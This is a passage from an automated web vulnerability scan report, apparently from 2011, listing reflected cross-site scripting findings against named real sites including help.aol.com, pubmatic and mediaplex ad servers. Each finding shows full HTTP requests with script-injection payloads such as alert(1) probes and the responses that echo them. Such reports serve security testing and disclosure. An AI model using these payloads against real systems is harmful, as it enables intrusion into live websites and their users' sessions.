The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14ed8"%3b39d6845c6c7 was submitted in the REST URL parameter 2. This input was echoed as 14ed8";39d6845c6c7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/promo14ed8"%3b39d6845c6c7 HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13088

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:promo14ed8";39d6845c6c7:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:promo14ed8";39d6845c6c7:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/rankings

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193e1"%3b34ee4aa9b68 was submitted in the REST URL parameter 1. This input was echoed as 193e1";34ee4aa9b68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball193e1"%3b34ee4aa9b68/rankings HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:54:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball193e1";34ee4aa9b68:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball193e1";34ee4aa9b68:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.88. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fantasysource.sportingnews.com
Path:   /baseball/rankings

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17284"%3bf499440a53d was submitted in the REST URL parameter 2. This input was echoed as 17284";f499440a53d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /baseball/rankings17284"%3bf499440a53d HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:54:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13103

<!DOCTYPE html>
<html>


<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <![endif]-->
<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:rankings17284";f499440a53d:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:rankings17284";f499440a53d:error";
s_265.prop12=document.URL.split('?')
...[SNIP]...

5.89. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eae9<script>alert(1)</script>0cba47d02b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k3eae9<script>alert(1)</script>0cba47d02b4/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000871
Content-Length: 68
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:58:59 GMT
Connection: close

Not Found: /k3eae9<script>alert(1)</script>0cba47d02b4/uni0vle-e.css

5.90. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fonts.citysbest.com
Path:   /k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63185<script>alert(1)</script>0fabb271aad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.css63185<script>alert(1)</script>0fabb271aad?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000740
Content-Length: 68
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close

Not Found: /k/uni0vle-e.css63185<script>alert(1)</script>0fabb271aad

5.91. http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://help.aol.com
Path:   /help/microsites/search.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9ad"><script>alert(1)</script>396e1d41820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/microsites/search.do?aa9ad"><script>alert(1)</script>396e1d41820=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=8E8C3AA10141FE4A03C8800AF8C9CDEF.help-dtc39; Path=/help
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4d4b245525d5f4f58455e445a4a423660;expires=Thu, 05-May-2011 10:55:20 GMT;path=/;httponly
Content-Length: 31609


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <script type="text/jav
...[SNIP]...
<TextArea name="aa9ad"><script>alert(1)</script>396e1d41820" style="display:none;visibility:hide">
...[SNIP]...

5.92. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d28ae'-alert(1)-'495b642cc39 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/d28ae'-alert(1)-'495b642cc39 HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=5B355879-97D3-4AC3-AE3F-540B6CD0770B; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:37 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 512

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/d28ae'-alert(1)-'495b642cc39">
...[SNIP]...

5.93. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e27af'-alert(1)-'bb8e4024b12 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708e27af'-alert(1)-'bb8e4024b12&pageURL=http://www.huffingtonpost.com/ HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=CC005CC7-9E15-4A3C-8AE5-B6DBB9A113AD; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:37 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 512

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
nheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.8117935182526708e27af'-alert(1)-'bb8e4024b12&pageURL=http://www.huffingtonpost.com/">
...[SNIP]...

5.94. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15011"-alert(1)-"5cbe7d4d6c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:21 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5958
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c");
mpck = "h
...[SNIP]...

5.95. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6d1'%3balert(1)//28df9a82fdd was submitted in the mpck parameter. This input was echoed as 8c6d1';alert(1)//28df9a82fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D5969019738c6d1'%3balert(1)//28df9a82fdd&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:23 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5968
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=5969019738c6d1';alert(1)//28df9a82fdd" target="_blank">
...[SNIP]...

5.96. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdc3'%3balert(1)//93ec51d6ca8 was submitted in the mpvc parameter. This input was echoed as 2bdc3';alert(1)//93ec51d6ca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596901973&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=2bdc3'%3balert(1)//93ec51d6ca8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:27 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5964
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=2bdc3';alert(1)//93ec51d6ca8http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=596901973" target="_blank">
...[SNIP]...

5.97. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5855b"%3balert(1)//5790aae0cca was submitted in the mpvc parameter. This input was echoed as 5855b";alert(1)//5790aae0cca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596901973&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=5855b"%3balert(1)//5790aae0cca HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:25 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5964
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=5855b";alert(1)//5790aae0cca");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b
...[SNIP]...

5.98. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 166e7"-alert(1)-"2899149135e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

